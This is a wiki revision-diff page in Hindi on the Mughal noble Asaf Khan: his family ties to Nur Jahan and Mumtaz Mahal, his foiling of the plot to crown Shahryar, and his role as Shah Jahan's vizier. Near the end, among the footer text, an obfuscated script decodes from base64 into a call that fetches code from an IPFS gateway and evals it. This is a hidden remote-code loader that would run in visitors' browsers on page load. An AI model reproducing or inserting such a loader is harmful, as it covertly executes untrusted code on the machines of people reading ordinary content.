Difference between revisions of "आसफ़ ख़ाँ (गियासबेग़ पुत्र)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{बहुविकल्पी|आसफ़ ख़ाँ}}
 
{{बहुविकल्पी|आसफ़ ख़ाँ}}
*आसफ़ ख़ाँ, बादशाह [[अकबर]] के शासनकाल में [[फ़ारस]] से [[भारत]] आने वाले [[मिर्ज़ा गियासबेग़]] का पुत्र और मेहरुन्निसा का भाई था, जो बादशाह [[जहाँगीर]] (1605-27 ई.) की मलका [[नूरजहाँ]] के नाम से अधिक विख्यात है।
+
*'''आसफ़ ख़ाँ''' बादशाह [[अकबर]] के शासनकाल में [[फ़ारस]] से [[भारत]] आने वाले [[मिर्ज़ा गियासबेग़]] का पुत्र और मेहरुन्निसा का भाई था।
 +
*बाद में यही मेहरुन्निसा बादशाह [[जहाँगीर]] की मलका [[नूरजहाँ]] के नाम से अधिक विख्यात हुई।
 
*आसफ़ ख़ाँ शाही सेवा में था और [[मुग़ल]] दरबार का एक प्रमुख ओहदेदार बन गया था।
 
*आसफ़ ख़ाँ शाही सेवा में था और [[मुग़ल]] दरबार का एक प्रमुख ओहदेदार बन गया था।
*आसफ़ ख़ाँ की बेटी [[मुमताज़ महल]] बादशाह जहाँगीर के तीसरे बेटे शहज़ादा ख़ुर्रम को ब्याही थी, जो [[शाहजहाँ]] के नाम से विख्यात है।
+
*आसफ़ ख़ाँ की बेटी [[मुमताज़ महल]] बादशाह जहाँगीर के तीसरे बेटे शहज़ादा ख़ुर्रम ([[शाहजहाँ]]) को ब्याही थी।
 
*1627 ई. में जहाँगीर की मौत के बाद आसफ़ ख़ाँ ने नूरजहाँ के उस षड़यंत्र को विफल कर दिया, जिसके द्वारा वह जहाँगीर के सबसे छोटे बेटे [[शहरयार]] को बादशाह बनाना चाहती थी।
 
*1627 ई. में जहाँगीर की मौत के बाद आसफ़ ख़ाँ ने नूरजहाँ के उस षड़यंत्र को विफल कर दिया, जिसके द्वारा वह जहाँगीर के सबसे छोटे बेटे [[शहरयार]] को बादशाह बनाना चाहती थी।
 
*शहरयार को नूरजहाँ की बेटी ब्याही थी। आसफ़ ख़ाँ ने शाहजहाँ को बादशाह बनाने में सफलता प्राप्त की।
 
*शहरयार को नूरजहाँ की बेटी ब्याही थी। आसफ़ ख़ाँ ने शाहजहाँ को बादशाह बनाने में सफलता प्राप्त की।
Line 20: Line 21:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मध्य काल}}
 
{{मध्य काल}}
__INDEX__
 
  
 +
[[Category:मुग़ल साम्राज्य]]
 +
[[Category:इतिहास कोश]]
 
[[Category:मध्य काल]]
 
[[Category:मध्य काल]]
[[Category:इतिहास कोश]]
+
__INDEX__

Revision as of 06:31, 23 April 2011

  • asaf khaan badashah akabar ke shasanakal mean faras se bharat ane vale mirza giyasabeg ka putr aur meharunnisa ka bhaee tha.
  • bad mean yahi meharunnisa badashah jahaangir ki malaka noorajahaan ke nam se adhik vikhyat huee.
  • asaf khaan shahi seva mean tha aur mugal darabar ka ek pramukh ohadedar ban gaya tha.
  • asaf khaan ki beti mumataz mahal badashah jahaangir ke tisare bete shahazada khurram (shahajahaan) ko byahi thi.
  • 1627 ee. mean jahaangir ki maut ke bad asaf khaan ne noorajahaan ke us sh dayantr ko viphal kar diya, jisake dvara vah jahaangir ke sabase chhote bete shaharayar ko badashah banana chahati thi.
  • shaharayar ko noorajahaan ki beti byahi thi. asaf khaan ne shahajahaan ko badashah banane mean saphalata prapt ki.
  • badashah shahajahaan ne takht par baithane ke bad apane sasur asaf khaan ko saltanat ka vazir bana diya, jis pad par vah mrityuparyant bana raha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh